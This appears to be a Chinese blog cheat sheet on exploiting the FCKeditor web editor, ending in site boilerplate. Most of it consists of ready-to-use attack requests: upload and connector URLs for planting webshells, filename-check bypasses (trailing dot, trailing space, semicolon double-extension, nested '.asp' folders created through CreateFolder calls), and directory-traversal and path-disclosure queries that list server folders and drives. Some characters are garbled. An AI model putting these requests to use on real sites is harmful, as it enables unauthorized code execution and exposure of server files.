fckeditor编辑器漏洞
查看fckeditor編輯器版本
/_whatsnew.html /editor/dialog/fck_about.html- 查出版本信息之后就可以到網(wǎng)上搜相應(yīng)的漏洞
version2.2
Apache+linux 環(huán)境下在上傳文件后面加個.突破
version<=2.4.2 For php
- 該版本在處理PHP上傳的地方?jīng)]有對Media類型進(jìn)行上傳文件類型的控制,導(dǎo)致用戶上傳任意文件。
- 將以下保存為html文件,action別忘了改成自己的,然后就可以上傳木馬,不知道上傳路徑就用bp抓包。
test文件的上傳地址(結(jié)合解析漏洞)
FCKeditor/editor/filemanager/browser/default/connectors/test.html(2.4.3)
FCKeditor/editor/filemanager/upload/test.html(2.4.3)
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
如圖,發(fā)現(xiàn)有上傳,但是有可能是測試用的,并不能真正上傳木馬,這時候去嘗試其他的鏈接。
其他上傳地址
FCKeditor/_samples/default.html(2.4.3)
FCKeditor/_samples/asp/sample01.asp(2.4.3)
FCKeditor/_samples/asp/sample02.asp(2.4.3)
FCKeditor/_samples/asp/sample03.asp(2.4.3)
FCKeditor/_samples/asp/sample04.asp(2.4.3)
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (2.6.3)
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/connectors/test.html(2.6.6)
FCKeditor/editor/filemanager/connectors/uploadtest.html(2.6.6)
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
可以嘗試?yán)霉ぞ?#xff0c;如圖。
突破文件名限制“.”變“_”下劃線
1.提交1.php+空格繞過:空格只支持windows系統(tǒng),linux系統(tǒng)是不支持的,可提交1.php+空格來繞過文件名限制。
2.可以在之前的文件夾x.asp下再新建一個文件夾xx.asp,這樣只檢測了第一級的目錄xx.asp,如果第二級目錄x.asp就不會受限制,把木馬上傳到x.asp中即可。可以通過下面的建立文件夾突破,也可以通過bp抓包
%2f在這里就是/,我們可以把這里改為/cc.asp
3.二次上傳:繼續(xù)上傳同名文件可變?yōu)?.php;(1).jpg,很多時候上傳的文件例如1.php;.jpg 會變?yōu)?_php;.jpg ,上傳兩次1.asp;jpg來突破。
突破建立文件夾
/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp
/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=124478997568
爆路徑漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
FCKeditor被動限制策略所導(dǎo)致的過濾不嚴(yán)問題
影響版本: <= FCKeditor v2.4.3
FCKeditor v2.4.3 中File 類別默認(rèn)拒絕上傳類型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
- Fckeditor 2.0 <= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 后綴的文件,上傳后它保存的文件直接用的$sFilePath=$sServerDir.$sFileName,而沒有使用$sExtension 為后綴.直接導(dǎo)致在win 下在上傳文件后面加個.來突破。
- 而在apache 下,因?yàn)?#34;Apache 文件名解析缺陷漏洞"也可以利用之,其他上傳漏洞中定義TYPE 變量時使用File類別來上傳文件,根據(jù)FCKeditor 的代碼,其限制最為狹隘。
jsp版本漏洞
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFold=/
上傳馬所在的目錄:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/
上傳shell的地址:
FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
列目錄漏洞
1.修改CurrentFolder 參數(shù)使用 …/…/來進(jìn)入不同的目錄:
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=…/…/(2.4.1)
2.根據(jù)xml返回信息查看網(wǎng)站目錄:
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=…/…/…/&NewFolderName=shell.asp
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
3.獲取當(dāng)前文件夾
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.瀏覽E盤文件:
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
5.FCKeditor/editor/fckeditor.html 不可以上傳文件,可以點(diǎn)擊上傳圖片按鈕再選擇瀏覽服務(wù)器即可跳轉(zhuǎn)至可上傳文件頁,可以查看已經(jīng)上傳的文件。
6.遍歷目錄
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=…/…
browser
fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=…/…/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
總結(jié)
以上是生活随笔為你收集整理的fckeditor编辑器漏洞的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C#--控件数组遍历
- 下一篇: 2014年计算机一级考试试题,2014年